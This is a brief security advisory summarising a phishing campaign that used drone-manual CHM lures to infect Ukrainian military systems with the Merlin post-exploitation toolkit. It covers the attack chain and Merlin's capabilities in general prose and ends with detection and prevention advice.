Ukrainian Military Targeted in Phishing Campaign Leveraging Drone Manuals

Cyber Security Threat Summary:
“Ukrainian military entities are the target of a phishing campaign that leverages drone manuals as lures to deliver a Go-based open-source post-exploitation toolkit called Merlin. ‘Since drones or Unmanned Aerial Vehicles (UAVs) have been an integral tool used by the Ukrainian military, malware-laced lure files themed as UAVs service manuals have begun to surface," Securonix researchers Den Iuzvyk, Tim Peck, and Oleg Kolesnikov said in a report shared with The Hacker News. The cybersecurity company is tracking the campaign under the name STARK#VORTEX. The starting point of the attack is a Microsoft Compiled HTML Help (CHM) file that, when opened, runs malicious JavaScript embedded inside one of the HTML pages to execute PowerShell code designed to contact a remote server to fetch an obfuscated binary. The Windows-based payload is decoded to extract the Merlin Agent, which, in turn, is configured to communicate with a command-and-control (C2) server for post-exploitation actions, effectively seizing control over the host.

Security Officer Comments:
Merlin has been used in the past to target Ukrainian government organizations. For instance just last month, Ukraine’s Computer Emergency Response Team disclosed a similar attack chain that employs CHM files as decoys to infect computers with the open-source tool. For its part, Merlin comes with a wide range of capabilities, making it a popular alternative to post-exploitation tools like Cobalt Strike and Sliver. Some of the capabilities of Merlin include:

  • Encrypted C2 communication using TLS
  • Remote command shell
  • Module support (such as Mimikatz)
  • Binary support for exe or dll clients
Suggested Correction(s):
Always be extra cautious downloading file attachments from posts for private messages. When it comes to prevention and detection, the Securonix Threat Research Team recommends:
  • Avoid downloading files or attachments from untrusted sources, especially if the source was unsolicited
  • Monitor common malware staging directories, especially “C:\ProgramData” and other temporary locations such as the user’s local appdata folder which was used in this attack campaign
  • Deploy additional process-level logging such as Sysmon and PowerShell logging for additional log detection coverage